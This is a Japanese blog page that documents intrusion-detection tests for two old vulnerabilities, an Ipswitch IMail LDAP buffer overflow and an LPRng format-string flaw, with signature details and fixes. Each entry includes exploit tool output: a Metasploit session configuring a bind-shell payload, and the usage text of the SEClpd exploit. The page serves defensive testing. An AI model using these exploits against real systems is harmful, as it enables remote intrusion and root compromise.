つぶやき

このブログは,ご覧頂いたあなたのコンピュータが犯罪に利用されていないか?確認していただく為のひとつの手段としてご利用頂ければ幸いです。電子メール:amaterasu@job.email.ne.jp


テーマ:


項目

攻撃

リモート

攻撃ポート

389

対象OS

Windows

CVE

CVE-2004-0297

MS

PAM

Ipswitch IMail での LDAP デーモンの大きなタグによるバッファ オーバーフロー (LDAP_Server_ASN1_Overflow)
このシグネチャまたは脆弱点について
RealSecure Server Sensor、RealSecure Network Sensor:

このシグネチャは、LDAP メッセージを正しく解析できない LDAP サーバー上でオーバーフロー状態を引き起こす可能性のある、ASN.1 でエンコードされた不正な形式の LDAP メッセージを検出します。


デフォルトの危険度
高危険度

このシグネチャが添付されているセンサー
RealSecure Server Sensor: XPU 22.11 以降、RealSecure Network Sensor: XPU 22.11 以降

影響を受けるシステム
Windows NT: 任意のバージョン、Windows XP: Professional、Windows 2000: 任意のバージョン、Windows 2003: Server、IMail Server: 8.03

タイプ
不正アクセスの試み

脆弱点の説明
Ipswitch IMail は、Microsoft Windows オペレーティング システムに対応する Web ベースのメール サーバーです。 Ipswitch IMail バージョン 8.03 (場合によってはこれより古いバージョンも) は、ユーザー入力の境界チェックが不適切なために発生する、Lightweight Directory Access Protocol (LDAP) でのバッファ オーバーフローに対して脆弱です。 リモートの攻撃者が大きなタグを含む LDAP メッセージを送信することでバッファをオーバーフローさせ、デーモンをクラッシュさせたり、管理者権限を使ってシステム上で任意のコードを実行したりする可能性があります。

この脆弱点の解決方法
Ipswitch の Web サイトから、IMail Server 8.05 の Hotfix 2 を入手して適用します。


詳細

Ipswitch IMail LDAP daemon large tag buffer overflow

http://www.iss.net/security_center/static/15243.php



検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.66



実証コード

msf imail_ldap(win32_bind) > show options


Exploit and Payload Options

===========================


Exploit: Name Default Description

-------- ------ --------------- ------------------

optional SSL Use SSL

required RHOST 192.168.221.180 The target address

required RPORT 389 The target port


Payload: Name Default Description

-------- -------- ------- --------------------------------------


required EXITFUNC seh Exit technique: "process", "thread", "

required LPORT 4444 Listening port for bind shell


Target: Windows 2000 English


msf imail_ldap(win32_bind) > exploit

[*] Starting Bind Handler.

[*] Connected to LDAP, trying to exploit Windows 2000 English

[*] Exiting Bind Handler.



トレース

イベント一覧

優先度

シグネチャ名

検知件数

High

LDAP_Server_ASN1_Overflow

1

Low

TCP_Probe_Other

13

Low

LDAP_Message

1


イベント詳細


LDAP_Server_ASN1_Overflow.jpg

AD
いいね!した人  |  リブログ(0)

テーマ:

項目

攻撃

リモート

攻撃ポート

515

対象OS

Unix

CVE

CAN-2000-0917

MS



LPRng syslog() call allows user supplied format strings (LPRng_Format_String)
このシグネチャまたは脆弱点について
RealSecure Network Sensor: このシグネチャは、書式指定子が含まれた LPR コマンドを (TCP ポート 515で) 検出します。このコマンドは、攻撃者がホストで任意のコードを実行しようとした試みを示す可能性があります。 検出される実際のコマンドは、Raw Command information フィールドにレポートされます。

デフォルトの危険度
高危険度

このシグネチャが添付されているセンサー
RealSecure Network Sensor: XPU 2.2 以降

影響を受けるシステム
TurboLinux、FreeBSD、Red Hat Linux: 7.0、Caldera OpenLinux: 2.4、Caldera OpenLinux: 2.3

タイプ
不正アクセスの試み

脆弱点の説明
一部の Linux ディストリビューションに含まれる LPRng プリンタ デーモンは、書式文字列攻撃に対して脆弱です。 ユーザーが入力した内容は、書式文字列引数を含まない LPRng の syslog() 呼び出しに渡されます。 攻撃者はこの脆弱点を悪用して、セグメント化を失敗させ、任意のコードを実行し、場合によっては root 権限を得ることが可能です。

この脆弱点の解決方法
Caldera OpenLinux の場合: Caldera Systems, Inc. Security Advisory CSSA-2000-033.0 を参照して、最新バージョンの LPRng(3.5.3-3 以降) にアップグレードします。 Red Hat Linux の場合: Red Hat, Inc. Security Advisory RHSA-2000:065-04 を参照して、最新バージョンの LPRng(3.6.24-2 以降) にアップグレードします。 FreeBSD の場合: FreeBSD, Inc. Security Advisory FreeBSD-SA-00:56 を参照して、最新バージョンの LPRng(3.6.25 以降) にアップグレードします。 TurboLinux の場合: TurboLinux Security Announcement TLSA2001001-1 を参照して、最新バージョンの LPRng(3.6.26-1 以降) にアップグレードします。 それ以外のディストリビューションの場合: アップグレード情報またはパッチ情報については、製造元にお問い合わせください。



詳細

ISS X-Force

LPRng syslog() call allows user supplied format strings

http://www.iss.net/security_center/static/5287.php


CVE
CAN-2000-0917
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0917


検証環境

優先度

OS

IP

Intruder:

Windows2000

192.168.221.11

Victim:

Windows2000

192.168.221.180

センサー

ProvenitaM10

XPU1.66




実証コード

[root@linux BufferOverflow]# ./LPRng_Format_String_SEClpd

SEClpd by DiGiT of ADM/security.is !


Usage: ./LPRng_Format_String_SEClpd victim ["brute"] -t type [-o offset] [-a align] [-p position] [-r eip_addr] [-c shell_addr]

[-w written_bytes]


ie: ./SEClpd localhost -t 0 For most redhat 7.0 boxes

ie: ./SEClpd localhost brute -t 0 For brute forcing all redhat 7.0 boxes

Types:


[ Type 0: [ RedHat 7.0 - Guinesss ]

[ Type 1: [ RedHat 7.0 - Guinesss-dev ]

[root@linux BufferOverflow]#



トレース

LPRng_Format_String.jpg


AD
いいね!した人  |  リブログ(0)

AD

ブログをはじめる

たくさんの芸能人・有名人が
書いているAmebaブログを
無料で簡単にはじめることができます。

公式トップブロガーへ応募

多くの方にご紹介したいブログを
執筆する方を「公式トップブロガー」
として認定しております。

芸能人・有名人ブログを開設

Amebaブログでは、芸能人・有名人ブログを
ご希望される著名人の方/事務所様を
随時募集しております。